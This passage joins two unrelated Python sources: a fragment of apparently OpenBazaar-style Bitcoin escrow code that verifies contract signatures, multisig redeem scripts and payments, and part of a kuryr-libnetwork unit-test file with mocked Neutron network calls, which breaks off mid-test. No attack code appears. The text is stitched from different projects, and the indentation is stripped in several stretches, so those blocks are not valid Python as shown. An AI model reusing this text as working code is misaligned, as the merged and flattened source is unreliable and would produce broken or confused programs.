shipping = self.contract["buyer_order"]["order"]["shipping"]
keys = ["ship_to", "address", "postal_code", "city", "state", "country"]
for value in map(shipping.get, keys):
if value is None:
raise Exception("Missing shipping field")
# verify buyer ID
pubkeys = self.contract["buyer_order"]["order"]["id"]["pubkeys"]
keys = ["guid", "bitcoin"]
for value in map(pubkeys.get, keys):
if value is None:
raise Exception("Missing pubkey field")
return True
except Exception, e:
return e.message
def validate_for_moderation(self, proof_sig):
validation_failures = []
tmp_contract = deepcopy(self.contract)
if "buyer_order" in tmp_contract:
del tmp_contract["buyer_order"]
if "vendor_order_confirmation" in tmp_contract:
del tmp_contract["vendor_order_confirmation"]
if "buyer_receipt" in tmp_contract:
del tmp_contract["buyer_receipt"]
del tmp_contract["dispute"]
contract_hash = digest(json.dumps(tmp_contract, indent=4))
ref_hash = unhexlify(self.contract["buyer_order"]["order"]["ref_hash"])
listing = json.dumps(self.contract["vendor_offer"]["listing"], indent=4)
# verify that the reference hash matches the contract
if contract_hash != ref_hash:
validation_failures.append("Reference hash in buyer_order doesn't match the listing hash;")
# validated the signatures on vendor_offer
vendor_guid_signature = self.contract["vendor_offer"]["signatures"]["guid"]
vendor_bitcoin_signature = self.contract["vendor_offer"]["signatures"]["bitcoin"]
vendor_guid_pubkey = unhexlify(self.contract["vendor_offer"]["listing"]["id"]["pubkeys"]["guid"])
vendor_bitcoin_pubkey = self.contract["vendor_offer"]["listing"]["id"]["pubkeys"]["bitcoin"]
verify_key = nacl.signing.VerifyKey(vendor_guid_pubkey)
try:
verify_key.verify(listing, base64.b64decode(vendor_guid_signature))
except Exception:
validation_failures.append("Guid signature in vendor_offer not valid;")
valid = bitcointools.ecdsa_raw_verify(listing,
bitcointools.decode_sig(vendor_bitcoin_signature),
vendor_bitcoin_pubkey)
if not valid:
validation_failures.append("Bitcoin signature in vendor_offer is not valid;")
# verify the signatures on the order
order = json.dumps(self.contract["buyer_order"]["order"], indent=4)
buyer_guid_signature = self.contract["buyer_order"]["signatures"]["guid"]
buyer_bitcoin_signature = self.contract["buyer_order"]["signatures"]["bitcoin"]
buyer_bitcoin_pubkey = self.contract["buyer_order"]["order"]["id"]["pubkeys"]["bitcoin"]
buyer_guid_pubkey = unhexlify(self.contract["buyer_order"]["order"]["id"]["pubkeys"]["guid"])
verify_key = nacl.signing.VerifyKey(buyer_guid_pubkey)
try:
verify_key.verify(order, base64.b64decode(buyer_guid_signature))
except Exception:
validation_failures.append("Guid signature in buyer_order not valid;")
valid = bitcointools.ecdsa_raw_verify(order, bitcointools.decode_sig(buyer_bitcoin_signature),
buyer_bitcoin_pubkey)
if not valid:
validation_failures.append("Bitcoin signature in buyer_order not valid;")
# If the buyer filed this claim, check the vendor's signature to show he accepted the order.
if proof_sig is not None:
address = self.contract["buyer_order"]["order"]["payment"]["address"]
chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
masterkey_b = self.contract["buyer_order"]["order"]["id"]["pubkeys"]["bitcoin"]
buyer_key = derive_childkey(masterkey_b, chaincode)
amount = self.contract["buyer_order"]["order"]["payment"]["amount"]
listing_hash = self.contract["vendor_offer"]["listing"]["contract_id"]
verify_key = nacl.signing.VerifyKey(vendor_guid_pubkey)
try:
verify_key.verify(str(address) + str(amount) + str(listing_hash) + str(buyer_key),
base64.b64decode(proof_sig))
except Exception:
validation_failures.append("Vendor's order-acceptance signature not valid;")
# verify redeem script
chaincode = self.contract["buyer_order"]["order"]["payment"]["chaincode"]
for mod in self.contract["vendor_offer"]["listing"]["moderators"]:
if mod["guid"] == self.contract["buyer_order"]["order"]["moderator"]:
masterkey_m = mod["pubkeys"]["bitcoin"]["key"]
if masterkey_m != bitcointools.bip32_extract_key(self.keychain.bitcoin_master_pubkey):
validation_failures.append("Moderator Bitcoin key doesn't match key in vendor_order;")
masterkey_b = self.contract["buyer_order"]["order"]["id"]["pubkeys"]["bitcoin"]
masterkey_v = self.contract["vendor_offer"]["listing"]["id"]["pubkeys"]["bitcoin"]
buyer_key = derive_childkey(masterkey_b, chaincode)
vendor_key = derive_childkey(masterkey_v, chaincode)
moderator_key = derive_childkey(masterkey_m, chaincode)
redeem_script = bitcointools.mk_multisig_script([buyer_key, vendor_key, moderator_key], 2)
if redeem_script != self.contract["buyer_order"]["order"]["payment"]["redeem_script"]:
validation_failures.append("Bitcoin redeem script not valid for the keys in this contract;")
# verify address from redeem script
if self.testnet:
payment_address = bitcointools.p2sh_scriptaddr(redeem_script, 196)
else:
payment_address = bitcointools.p2sh_scriptaddr(redeem_script)
if self.contract["buyer_order"]["order"]["payment"]["address"] != payment_address:
validation_failures.append("Bitcoin address invalid. Cannot be derived from reddem script;")
# validate vendor_order_confirmation
if "vendor_order_confirmation" in self.contract:
contract_dict = json.loads(json.dumps(self.contract, indent=4), object_pairs_hook=OrderedDict)
del contract_dict["vendor_order_confirmation"]
if "buyer_receipt" in contract_dict:
del contract_dict["buyer_receipt"]
contract_hash = digest(json.dumps(contract_dict, indent=4)).encode("hex")
ref_hash = self.contract["vendor_order_confirmation"]["invoice"]["ref_hash"]
if ref_hash != contract_hash:
validation_failures.append("Reference hash in vendor_order_confirmation does not match order ID;")
vendor_signature = self.contract["vendor_order_confirmation"]["signature"]
confirmation = json.dumps(self.contract["vendor_order_confirmation"]["invoice"], indent=4)
verify_key = nacl.signing.VerifyKey(vendor_guid_pubkey)
try:
verify_key.verify(confirmation, base64.b64decode(vendor_signature))
except Exception:
validation_failures.append("Vendor's signature in vendor_order_confirmation not valid;")
# check the moderator fee is correct
own_guid = self.keychain.guid.encode("hex")
for moderator in self.contract["vendor_offer"]["listing"]["moderators"]:
if moderator["guid"] == own_guid:
fee = float(moderator["fee"][:len(moderator["fee"]) -1])
if Profile(self.db).get().moderation_fee < fee:
validation_failures.append("Moderator fee in contract less than current moderation fee;")
return validation_failures
def __repr__(self):
return json.dumps(self.contract, indent=4)
def check_unfunded_for_payment(db, libbitcoin_client, notification_listener, testnet=False):
    """
    Run through the unfunded contracts in our database and query the
    libbitcoin server to see if they received a payment.

    Rows returned by get_unfunded() carry the order id at index 0 and a
    timestamp at index 1; only orders newer than 24 hours are polled.
    """
    now = time.time()
    for row in db.purchases.get_unfunded():
        if now - row[1] <= 86400:
            check_order_for_payment(row[0], db, libbitcoin_client, notification_listener, testnet)
    for row in db.sales.get_unfunded():
        if now - row[1] <= 86400:
            check_order_for_payment(row[0], db, libbitcoin_client, notification_listener, testnet)
def check_order_for_payment(order_id, db, libbitcoin_client, notification_listener, testnet=False):
    """Check the blockchain for payment of a single unfunded order.

    Locates the order's unfunded contract file (purchase or sale), asks the
    libbitcoin server for the payment address history and, when the address
    has received at least the expected amount, records the outpoints on the
    contract and fires its payment_received handler.

    Args:
        order_id: id of the order; also the contract file name stem.
        db: database handle passed through to the Contract.
        libbitcoin_client: client used to fetch the address history.
        notification_listener: listener attached to the Contract.
        testnet: select testnet vs mainnet chain parameters.
    """
    try:
        purchase_path = os.path.join(DATA_FOLDER, "purchases", "unfunded", order_id + ".json")
        sale_path = os.path.join(DATA_FOLDER, "store", "contracts", "unfunded", order_id + ".json")
        if os.path.exists(purchase_path):
            file_path = purchase_path
            is_purchase = True
        elif os.path.exists(sale_path):
            file_path = sale_path
            is_purchase = False
        else:
            # No unfunded contract on disk for this order: nothing to do.
            # (Previously this fell through with file_path unbound and the
            # resulting NameError was silently swallowed below.)
            return
        with open(file_path, 'r') as filename:
            order = json.load(filename, object_pairs_hook=OrderedDict)
        c = Contract(db, contract=order, testnet=testnet)
        c.blockchain = libbitcoin_client
        c.notification_listener = notification_listener
        c.is_purchase = is_purchase
        addr = c.contract["buyer_order"]["order"]["payment"]["address"]
        SelectParams("testnet" if testnet else "mainnet")
        script_pubkey = CBitcoinAddress(addr).to_scriptPubKey().encode("hex")

        def history_fetched(ec, history):
            # Callback invoked by libbitcoin with the address history rows.
            if not ec:
                # pylint: disable=W0612
                # pylint: disable=W0640
                amount_funded = 0
                outpoints = []
                for objid, txhash, index, height, value in history:
                    amount_funded += value
                    o = {
                        "txid": txhash.encode("hex"),
                        "vout": index,
                        "value": value,
                        "scriptPubKey": script_pubkey
                    }
                    outpoints.append(o)
                # get the amount (in satoshi) the user is expected to pay
                amount_to_pay = int(float(c.contract["buyer_order"]["order"]["payment"]["amount"]) * 100000000)
                if amount_funded >= amount_to_pay:
                    c.outpoints = outpoints
                    c.payment_received()
        libbitcoin_client.fetch_history2(addr, history_fetched)
    except Exception:
        # Best effort: any failure here is retried on the next polling pass.
        pass
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import uuid
import ddt
from oslo_serialization import jsonutils
from kuryr.lib import constants as lib_const
from kuryr.lib import utils as lib_utils
from kuryr_libnetwork import app
from kuryr_libnetwork import config
from kuryr_libnetwork import constants
from kuryr_libnetwork.tests.unit import base
from kuryr_libnetwork import utils
@ddt.ddt
class TestKuryr(base.TestKuryrBase):
"""Basic unitests for libnetwork remote driver URI endpoints.
This test class covers the following HTTP methods and URIs as described in
the remote driver specification as below:
https://github.com/docker/libnetwork/blob/3c8e06bc0580a2a1b2440fe0792fbfcd43a9feca/docs/remote.md # noqa
- POST /Plugin.Activate
- POST /NetworkDriver.GetCapabilities
- POST /NetworkDriver.CreateNetwork
- POST /NetworkDriver.DeleteNetwork
- POST /NetworkDriver.CreateEndpoint
- POST /NetworkDriver.EndpointOperInfo
- POST /NetworkDriver.DeleteEndpoint
- POST /NetworkDriver.Join
- POST /NetworkDriver.Leave
- POST /NetworkDriver.DiscoverNew
- POST /NetworkDriver.DiscoverDelete
"""
@ddt.data(('/Plugin.Activate', constants.SCHEMA['PLUGIN_ACTIVATE']),
('/NetworkDriver.GetCapabilities',
{'Scope': config.CONF.capability_scope}),
('/NetworkDriver.DiscoverNew', constants.SCHEMA['SUCCESS']),
('/NetworkDriver.DiscoverDelete', constants.SCHEMA['SUCCESS']))
@ddt.unpack
def test_remote_driver_endpoint(self, endpoint, expected):
response = self.app.post(endpoint)
decoded_json = jsonutils.loads(response.data)
self.assertEqual(expected, decoded_json)
    def test_network_driver_create_network(self):
        """CreateNetwork makes a Neutron network, tags it and adds a v4 subnet."""
        docker_network_id = lib_utils.get_hash()
        self.mox.StubOutWithMock(app.neutron, "create_network")
        fake_request = {
            "network": {
                "name": utils.make_net_name(docker_network_id),
                "admin_state_up": True
            }
        }
        # The following fake response is retrieved from the Neutron doc:
        # http://developer.openstack.org/api-ref-networking-v2.html#createNetwork # noqa
        fake_neutron_net_id = "4e8e5957-649f-477b-9e5b-f1f75b21c03c"
        fake_response = {
            "network": {
                "status": "ACTIVE",
                "subnets": [],
                "name": utils.make_net_name(docker_network_id),
                "admin_state_up": True,
                "tenant_id": "9bacb3c5d39d41a79512987f338cf177",
                "router:external": False,
                "segments": [],
                "shared": False,
                "id": fake_neutron_net_id
            }
        }
        app.neutron.create_network(fake_request).AndReturn(fake_response)
        self.mox.StubOutWithMock(app.neutron, "add_tag")
        # The driver is expected to tag the new network with the Docker net id.
        tags = utils.create_net_tags(docker_network_id)
        for tag in tags:
            app.neutron.add_tag('networks', fake_neutron_net_id, tag)
        self.mox.StubOutWithMock(app.neutron, 'list_subnets')
        fake_existing_subnets_response = {
            "subnets": []
        }
        fake_cidr_v4 = '192.168.42.0/24'
        app.neutron.list_subnets(
            network_id=fake_neutron_net_id,
            cidr=fake_cidr_v4).AndReturn(fake_existing_subnets_response)
        self.mox.StubOutWithMock(app.neutron, 'create_subnet')
        fake_subnet_request = {
            "subnets": [{
                'name': fake_cidr_v4,
                'network_id': fake_neutron_net_id,
                'ip_version': 4,
                'cidr': fake_cidr_v4,
                'enable_dhcp': app.enable_dhcp,
                'gateway_ip': '192.168.42.1',
            }]
        }
        subnet_v4_id = str(uuid.uuid4())
        fake_v4_subnet = self._get_fake_v4_subnet(
            fake_neutron_net_id, subnet_v4_id,
            name=fake_cidr_v4, cidr=fake_cidr_v4)
        fake_subnet_response = {
            'subnets': [
                fake_v4_subnet['subnet']
            ]
        }
        app.neutron.create_subnet(
            fake_subnet_request).AndReturn(fake_subnet_response)
        self.mox.ReplayAll()
        # Libnetwork-side request: IPv4 pool with gateway, empty Options.
        network_request = {
            'NetworkID': docker_network_id,
            'IPv4Data': [{
                'AddressSpace': 'foo',
                'Pool': '192.168.42.0/24',
                'Gateway': '192.168.42.1/24',
            }],
            'IPv6Data': [{
                'AddressSpace': 'bar',
                'Pool': 'fe80::/64',
                'Gateway': 'fe80::f816:3eff:fe20:57c3/64',
            }],
            'Options': {}
        }
        response = self.app.post('/NetworkDriver.CreateNetwork',
                                 content_type='application/json',
                                 data=jsonutils.dumps(network_request))
        self.assertEqual(200, response.status_code)
        decoded_json = jsonutils.loads(response.data)
        self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
    def test_network_driver_create_network_with_net_name_option(self):
        """With neutron.net.name set, an existing network is reused, not created."""
        docker_network_id = lib_utils.get_hash()
        fake_neutron_net_id = "4e8e5957-649f-477b-9e5b-f1f75b21c03c"
        self.mox.StubOutWithMock(app.neutron, "list_networks")
        fake_neutron_net_name = 'my_network_name'
        fake_existing_networks_response = {
            "networks": [{
                "status": "ACTIVE",
                "subnets": [],
                "admin_state_up": True,
                "tenant_id": "9bacb3c5d39d41a79512987f338cf177",
                "router:external": False,
                "segments": [],
                "shared": False,
                "id": fake_neutron_net_id,
                "name": "my_network_name"
            }]
        }
        app.neutron.list_networks(
            name=fake_neutron_net_name).AndReturn(
            fake_existing_networks_response)
        self.mox.StubOutWithMock(app.neutron, "add_tag")
        tags = utils.create_net_tags(docker_network_id)
        for tag in tags:
            app.neutron.add_tag('networks', fake_neutron_net_id, tag)
        # Reused networks additionally get the 'kuryr.net.existing' tag so the
        # driver knows not to delete them later.
        app.neutron.add_tag(
            'networks', fake_neutron_net_id, 'kuryr.net.existing')
        self.mox.StubOutWithMock(app.neutron, 'list_subnets')
        fake_existing_subnets_response = {
            "subnets": []
        }
        fake_cidr_v4 = '192.168.42.0/24'
        app.neutron.list_subnets(
            network_id=fake_neutron_net_id,
            cidr=fake_cidr_v4).AndReturn(fake_existing_subnets_response)
        self.mox.StubOutWithMock(app.neutron, 'create_subnet')
        fake_subnet_request = {
            "subnets": [{
                'name': fake_cidr_v4,
                'network_id': fake_neutron_net_id,
                'ip_version': 4,
                'cidr': fake_cidr_v4,
                'enable_dhcp': app.enable_dhcp,
                'gateway_ip': '192.168.42.1',
            }]
        }
        subnet_v4_id = str(uuid.uuid4())
        fake_v4_subnet = self._get_fake_v4_subnet(
            fake_neutron_net_id, subnet_v4_id,
            name=fake_cidr_v4, cidr=fake_cidr_v4)
        fake_subnet_response = {
            'subnets': [
                fake_v4_subnet['subnet']
            ]
        }
        app.neutron.create_subnet(
            fake_subnet_request).AndReturn(fake_subnet_response)
        self.mox.ReplayAll()
        network_request = {
            'NetworkID': docker_network_id,
            'IPv4Data': [{
                'AddressSpace': 'foo',
                'Pool': '192.168.42.0/24',
                'Gateway': '192.168.42.1/24',
            }],
            'IPv6Data': [{
                'AddressSpace': 'bar',
                'Pool': 'fe80::/64',
                'Gateway': 'fe80::f816:3eff:fe20:57c3/64',
            }],
            'Options': {
                'com.docker.network.enable_ipv6': False,
                'com.docker.network.generic': {
                    'neutron.net.name': 'my_network_name'
                }
            }
        }
        response = self.app.post('/NetworkDriver.CreateNetwork',
                                 content_type='application/json',
                                 data=jsonutils.dumps(network_request))
        self.assertEqual(200, response.status_code)
        decoded_json = jsonutils.loads(response.data)
        self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
    def test_network_driver_create_network_with_netid_option(self):
        """With neutron.net.uuid set, an existing network is reused by id."""
        docker_network_id = lib_utils.get_hash()
        fake_neutron_net_id = "4e8e5957-649f-477b-9e5b-f1f75b21c03c"
        self.mox.StubOutWithMock(app.neutron, "list_networks")
        fake_existing_networks_response = {
            "networks": [{
                "status": "ACTIVE",
                "subnets": [],
                "admin_state_up": True,
                "tenant_id": "9bacb3c5d39d41a79512987f338cf177",
                "router:external": False,
                "segments": [],
                "shared": False,
                "id": fake_neutron_net_id,
            }]
        }
        app.neutron.list_networks(
            id=fake_neutron_net_id).AndReturn(
            fake_existing_networks_response)
        self.mox.StubOutWithMock(app.neutron, "add_tag")
        tags = utils.create_net_tags(docker_network_id)
        for tag in tags:
            app.neutron.add_tag('networks', fake_neutron_net_id, tag)
        # Reused networks additionally get the 'kuryr.net.existing' tag.
        app.neutron.add_tag(
            'networks', fake_neutron_net_id, 'kuryr.net.existing')
        self.mox.StubOutWithMock(app.neutron, 'list_subnets')
        fake_existing_subnets_response = {
            "subnets": []
        }
        fake_cidr_v4 = '192.168.42.0/24'
        app.neutron.list_subnets(
            network_id=fake_neutron_net_id,
            cidr=fake_cidr_v4).AndReturn(fake_existing_subnets_response)
        self.mox.StubOutWithMock(app.neutron, 'create_subnet')
        fake_subnet_request = {
            "subnets": [{
                'name': fake_cidr_v4,
                'network_id': fake_neutron_net_id,
                'ip_version': 4,
                'cidr': fake_cidr_v4,
                'enable_dhcp': app.enable_dhcp,
                'gateway_ip': '192.168.42.1',
            }]
        }
        subnet_v4_id = str(uuid.uuid4())
        fake_v4_subnet = self._get_fake_v4_subnet(
            fake_neutron_net_id, subnet_v4_id,
            name=fake_cidr_v4, cidr=fake_cidr_v4)
        fake_subnet_response = {
            'subnets': [
                fake_v4_subnet['subnet']
            ]
        }
        app.neutron.create_subnet(
            fake_subnet_request).AndReturn(fake_subnet_response)
        self.mox.ReplayAll()
        network_request = {
            'NetworkID': docker_network_id,
            'IPv4Data': [{
                'AddressSpace': 'foo',
                'Pool': '192.168.42.0/24',
                'Gateway': '192.168.42.1/24',
            }],
            'IPv6Data': [{
                'AddressSpace': 'bar',
                'Pool': 'fe80::/64',
                'Gateway': 'fe80::f816:3eff:fe20:57c3/64',
            }],
            'Options': {
                'com.docker.network.enable_ipv6': False,
                'com.docker.network.generic': {
                    'neutron.net.uuid': '4e8e5957-649f-477b-9e5b-f1f75b21c03c'
                }
            }
        }
        response = self.app.post('/NetworkDriver.CreateNetwork',
                                 content_type='application/json',
                                 data=jsonutils.dumps(network_request))
        self.assertEqual(200, response.status_code)
        decoded_json = jsonutils.loads(response.data)
        self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
    def test_network_driver_create_network_with_pool_name_option(self):
        """With neutron.pool.name set, the subnet is created from that pool."""
        self.mox.StubOutWithMock(app.neutron, 'list_subnetpools')
        fake_kuryr_subnetpool_id = str(uuid.uuid4())
        fake_name = "fake_pool_name"
        kuryr_subnetpools = self._get_fake_v4_subnetpools(
            fake_kuryr_subnetpool_id, name=fake_name)
        app.neutron.list_subnetpools(name=fake_name).AndReturn(
            {'subnetpools': kuryr_subnetpools['subnetpools']})
        docker_network_id = lib_utils.get_hash()
        self.mox.StubOutWithMock(app.neutron, "create_network")
        fake_request = {
            "network": {
                "name": utils.make_net_name(docker_network_id),
                "admin_state_up": True
            }
        }
        # The following fake response is retrieved from the Neutron doc:
        # http://developer.openstack.org/api-ref-networking-v2.html#createNetwork # noqa
        fake_neutron_net_id = "4e8e5957-649f-477b-9e5b-f1f75b21c03c"
        fake_response = {
            "network": {
                "status": "ACTIVE",
                "subnets": [],
                "name": utils.make_net_name(docker_network_id),
                "admin_state_up": True,
                "tenant_id": "9bacb3c5d39d41a79512987f338cf177",
                "router:external": False,
                "segments": [],
                "shared": False,
                "id": fake_neutron_net_id
            }
        }
        app.neutron.create_network(fake_request).AndReturn(fake_response)
        self.mox.StubOutWithMock(app.neutron, "add_tag")
        tags = utils.create_net_tags(docker_network_id)
        for tag in tags:
            app.neutron.add_tag('networks', fake_neutron_net_id, tag)
        self.mox.StubOutWithMock(app.neutron, 'list_subnets')
        fake_existing_subnets_response = {
            "subnets": []
        }
        fake_cidr_v4 = '192.168.42.0/24'
        app.neutron.list_subnets(
            network_id=fake_neutron_net_id,
            cidr=fake_cidr_v4).AndReturn(fake_existing_subnets_response)
        self.mox.StubOutWithMock(app.neutron, 'create_subnet')
        # Unlike the plain create-network case, the subnet request carries
        # the subnetpool id resolved from the pool name option.
        fake_subnet_request = {
            "subnets": [{
                'name': fake_cidr_v4,
                'network_id': fake_neutron_net_id,
                'ip_version': 4,
                'cidr': fake_cidr_v4,
                'enable_dhcp': app.enable_dhcp,
                'gateway_ip': '192.168.42.1',
                'subnetpool_id': fake_kuryr_subnetpool_id,
            }]
        }
        subnet_v4_id = str(uuid.uuid4())
        fake_v4_subnet = self._get_fake_v4_subnet(
            fake_neutron_net_id, subnet_v4_id,
            name=fake_cidr_v4, cidr=fake_cidr_v4)
        fake_subnet_response = {
            'subnets': [
                fake_v4_subnet['subnet']
            ]
        }
        app.neutron.create_subnet(
            fake_subnet_request).AndReturn(fake_subnet_response)
        self.mox.ReplayAll()
        network_request = {
            'NetworkID': docker_network_id,
            'IPv4Data': [{
                'AddressSpace': 'foo',
                'Pool': '192.168.42.0/24',
                'Gateway': '192.168.42.1/24',
            }],
            'IPv6Data': [{
                'AddressSpace': 'bar',
                'Pool': 'fe80::/64',
                'Gateway': 'fe80::f816:3eff:fe20:57c3/64',
            }],
            'Options': {
                'com.docker.network.enable_ipv6': False,
                'com.docker.network.generic': {
                    'neutron.pool.name': 'fake_pool_name'
                }
            }
        }
        response = self.app.post('/NetworkDriver.CreateNetwork',
                                 content_type='application/json',
                                 data=jsonutils.dumps(network_request))
        self.assertEqual(200, response.status_code)
        decoded_json = jsonutils.loads(response.data)
        self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
    def test_network_driver_create_network_wo_gw(self):
        """Without a Gateway in IPv4Data, no gateway_ip is sent to Neutron."""
        docker_network_id = lib_utils.get_hash()
        self.mox.StubOutWithMock(app.neutron, "create_network")
        fake_request = {
            "network": {
                "name": utils.make_net_name(docker_network_id),
                "admin_state_up": True
            }
        }
        # The following fake response is retrieved from the Neutron doc:
        # http://developer.openstack.org/api-ref-networking-v2.html#createNetwork # noqa
        fake_neutron_net_id = "4e8e5957-649f-477b-9e5b-f1f75b21c03c"
        fake_response = {
            "network": {
                "status": "ACTIVE",
                "subnets": [],
                "name": utils.make_net_name(docker_network_id),
                "admin_state_up": True,
                "tenant_id": "9bacb3c5d39d41a79512987f338cf177",
                "router:external": False,
                "segments": [],
                "shared": False,
                "id": fake_neutron_net_id
            }
        }
        app.neutron.create_network(fake_request).AndReturn(fake_response)
        self.mox.StubOutWithMock(app.neutron, "add_tag")
        tags = utils.create_net_tags(docker_network_id)
        for tag in tags:
            app.neutron.add_tag('networks', fake_neutron_net_id, tag)
        self.mox.StubOutWithMock(app.neutron, 'list_subnets')
        fake_existing_subnets_response = {
            "subnets": []
        }
        fake_cidr_v4 = '192.168.42.0/24'
        app.neutron.list_subnets(
            network_id=fake_neutron_net_id,
            cidr=fake_cidr_v4).AndReturn(fake_existing_subnets_response)
        self.mox.StubOutWithMock(app.neutron, 'create_subnet')
        # Note: no 'gateway_ip' key is expected in the subnet request.
        fake_subnet_request = {
            "subnets": [{
                'name': fake_cidr_v4,
                'network_id': fake_neutron_net_id,
                'ip_version': 4,
                'cidr': fake_cidr_v4,
                'enable_dhcp': app.enable_dhcp,
            }]
        }
        subnet_v4_id = str(uuid.uuid4())
        fake_v4_subnet = self._get_fake_v4_subnet(
            fake_neutron_net_id, subnet_v4_id,
            name=fake_cidr_v4, cidr=fake_cidr_v4)
        fake_subnet_response = {
            'subnets': [
                fake_v4_subnet['subnet']
            ]
        }
        app.neutron.create_subnet(
            fake_subnet_request).AndReturn(fake_subnet_response)
        self.mox.ReplayAll()
        network_request = {
            'NetworkID': docker_network_id,
            'IPv4Data': [{
                'AddressSpace': 'foo',
                'Pool': '192.168.42.0/24',
            }],
            'IPv6Data': [{
                'AddressSpace': 'bar',
                'Pool': 'fe80::/64',
                'Gateway': 'fe80::f816:3eff:fe20:57c3/64',
            }],
            'Options': {}
        }
        response = self.app.post('/NetworkDriver.CreateNetwork',
                                 content_type='application/json',
                                 data=jsonutils.dumps(network_request))
        self.assertEqual(200, response.status_code)
        decoded_json = jsonutils.loads(response.data)
        self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
def test_network_driver_create_network_with_network_id_not_exist(self):
docker_network_id = lib_utils.get_hash()
self.mox.StubOutWithMock(app.neutron, "list_networks")
fake_neutron_net_id = str(uuid.uuid4())
fake_existing_networks_response = {
"networks": []
}
app.neutron.list_networks(
id=fake_neutron_net_id).AndReturn(
fake_existing_networks_response)
self.mox.ReplayAll()
network_request = {
'NetworkID': docker_network_id,
'IPv4Data': [{
'AddressSpace': 'foo',
'Pool': '192.168.42.0/24',
}],
'IPv6Data': [{
'AddressSpace': 'bar',
'Pool': 'fe80::/64',
'Gateway': 'fe80::f816:3eff:fe20:57c3/64',
}],
'Options': {
constants.NETWORK_GENERIC_OPTIONS: {
constants.NEUTRON_UUID_OPTION: fake_neutron_net_id
}
}
}
response = self.app.post('/NetworkDriver.CreateNetwork',
content_type='application/json',
data=jsonutils.dumps(network_request))
self.assertEqual(500, response.status_code)
decoded_json = jsonutils.loads(response.data)
self.assertIn('Err', decoded_json)
err_message = ("Specified network id/name({0}) does not "
"exist.").format(fake_neutron_net_id)
self.assertEqual({'Err': err_message}, decoded_json)
def test_network_driver_create_network_with_network_name_not_exist(self):
docker_network_id = lib_utils.get_hash()
self.mox.StubOutWithMock(app.neutron, "list_networks")
fake_neutron_network_name = "fake_network"
fake_existing_networks_response = {
"networks": []
}
app.neutron.list_networks(
name=fake_neutron_network_name).AndReturn(
fake_existing_networks_response)
self.mox.ReplayAll()
network_request = {
'NetworkID': docker_network_id,
'IPv4Data': [{
'AddressSpace': 'foo',
'Pool': '192.168.42.0/24',
}],
'IPv6Data': [{
'AddressSpace': 'bar',
'Pool': 'fe80::/64',
'Gateway': 'fe80::f816:3eff:fe20:57c3/64',
}],
'Options': {
constants.NETWORK_GENERIC_OPTIONS: {
constants.NEUTRON_NAME_OPTION: fake_neutron_network_name
}
}
}
response = self.app.post('/NetworkDriver.CreateNetwork',
content_type='application/json',
data=jsonutils.dumps(network_request))
self.assertEqual(500, response.status_code)
decoded_json = jsonutils.loads(response.data)
self.assertIn('Err', decoded_json)
err_message = ("Specified network id/name({0}) does not "
"exist.").format(fake_neutron_network_name)
self.assertEqual({'Err': err_message}, decoded_json)
def test_network_driver_delete_network(self):
docker_network_id = lib_utils.get_hash()
fake_neutron_net_id = str(uuid.uuid4())
self._mock_out_network(fake_neutron_net_id, docker_network_id,
check_existing=True)
self.mox.StubOutWithMock(app.neutron, 'list_subnets')
fake_neutron_subnets_response = {"subnets": []}
app.neutron.list_subnets(network_id=fake_neutron_net_id).AndReturn(
fake_neutron_subnets_response)
self.mox.StubOutWithMock(app.neutron, 'delete_network')
app.neutron.delete_network(fake_neutron_net_id).AndReturn(None)
self.mox.ReplayAll()
data = {'NetworkID': docker_network_id}
response = self.app.post('/NetworkDriver.DeleteNetwork',
content_type='application/json',
data=jsonutils.dumps(data))
self.assertEqual(200, response.status_code)
decoded_json = jsonutils.loads(response.data)
self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
    def test_network_driver_delete_network_with_subnets(self):
        """Deleting a network also deletes its kuryr-owned v4/v6 subnets."""
        docker_network_id = lib_utils.get_hash()
        docker_endpoint_id = lib_utils.get_hash()
        fake_neutron_net_id = str(uuid.uuid4())
        self._mock_out_network(fake_neutron_net_id, docker_network_id,
                               check_existing=True)
        # The following fake response is retrieved from the Neutron doc:
        # http://developer.openstack.org/api-ref-networking-v2.html#createSubnet # noqa
        subnet_v4_id = "9436e561-47bf-436a-b1f1-fe23a926e031"
        subnet_v6_id = "64dd4a98-3d7a-4bfd-acf4-91137a8d2f51"
        fake_v4_subnet = self._get_fake_v4_subnet(
            docker_network_id, docker_endpoint_id, subnet_v4_id)
        fake_v6_subnet = self._get_fake_v6_subnet(
            docker_network_id, docker_endpoint_id, subnet_v6_id)
        fake_subnets_response = {
            "subnets": [
                fake_v4_subnet['subnet'],
                fake_v6_subnet['subnet']
            ]
        }
        self.mox.StubOutWithMock(app.neutron, 'list_subnets')
        app.neutron.list_subnets(network_id=fake_neutron_net_id).AndReturn(
            fake_subnets_response)
        # No kuryr subnetpools exist, so both subnets are deleted directly.
        self.mox.StubOutWithMock(app.neutron, 'list_subnetpools')
        fake_subnetpools_response = {"subnetpools": []}
        app.neutron.list_subnetpools(name='kuryr').AndReturn(
            fake_subnetpools_response)
        app.neutron.list_subnetpools(name='kuryr6').AndReturn(
            fake_subnetpools_response)
        self.mox.StubOutWithMock(app.neutron, 'delete_subnet')
        app.neutron.delete_subnet(subnet_v4_id).AndReturn(None)
        app.neutron.delete_subnet(subnet_v6_id).AndReturn(None)
        self.mox.StubOutWithMock(app.neutron, 'delete_network')
        app.neutron.delete_network(fake_neutron_net_id).AndReturn(None)
        self.mox.ReplayAll()
        data = {'NetworkID': docker_network_id}
        response = self.app.post('/NetworkDriver.DeleteNetwork',
                                 content_type='application/json',
                                 data=jsonutils.dumps(data))
        self.assertEqual(200, response.status_code)
        decoded_json = jsonutils.loads(response.data)
        self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
    def test_network_driver_create_endpoint(self):
        """CreateEndpoint reuses the Neutron port matching the requested IPs."""
        docker_network_id = lib_utils.get_hash()
        docker_endpoint_id = lib_utils.get_hash()
        fake_neutron_net_id = str(uuid.uuid4())
